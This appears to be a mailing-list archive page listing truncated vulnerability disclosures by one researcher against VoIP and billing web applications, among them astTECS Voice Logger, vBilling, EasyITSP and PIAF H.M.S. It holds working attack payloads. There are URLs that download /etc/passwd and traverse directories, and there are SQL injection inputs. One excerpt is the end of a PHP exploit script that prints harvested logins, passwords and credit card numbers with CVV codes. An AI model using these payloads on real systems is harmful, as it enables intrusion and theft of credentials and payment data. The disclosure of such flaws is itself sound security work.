Voice Logger astTECS - bypass login & arbitrary file download

2013-07-16 Thread Michał Błaszczak
: 168 file: manager_login.server.php 2) arbitrary file download http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd linie: 2 file:records.php http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd linie: 2 file:records.php 3) and other security bugs Michał Błaszczak http://blaszczakm.blogspot.com

[SQLi] vBilling for FreeSWITCH

2013-04-22 Thread Michał Błaszczak
ectory_id = '".$record_id."' "; 2) SQL Injection http://vbilling-host/customer/edit_customer input Firstname: zuo’;-- (example) Michał Błaszczak http://blaszczakm.blogspot.com

Directory Traversal - EasyITSP <= 2.0.7

2013-02-04 Thread Michał Błaszczak
txt") as $filename) { file: voicemail.php line: 186 - 190 if(isset($_GET['folder'])) { $vmfolder = $_GET['folder']; } else { $vmfolder = "INBOX"; } POC: http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../ Michał Błaszczak http://blaszczakm.blogspot.com

PIAF H.M.S - SQL Injection

2012-10-29 Thread Michał Błaszczak
# Exploit Title: PIAF H.M.S - SQL Injection # Date: 28/10/2012 # Author: Michał Błaszczak # Website: http://blaszczakm.blogspot.com # Vendor Homepage: http://code.google.com/p/piafhms/ file: bills.php line: 86-87 $query = $query . " ORDER BY ID DESC"; printf($quer

Exploit - EasyITSP by Lemens Telephone Systems 2.0.2

2012-10-29 Thread Michał Błaszczak
$test = explode(" ",$login[1]); if(trim($test[0])!='') { echo 'ID:'.$id_pod."\n"; echo 'LOGIN:'.$login[1]."\n"; echo 'Password:'.$pass[1]."\n"; echo 'CCnumber:'.$ccnum[1]."\n"; echo 'CCexpire:'.$ccexpire[1]."\n"; echo 'CCCVV:'.$cccvv[1]."\n\n"; } } ?> Michał Błaszczak http://blaszczakm.blogspot.com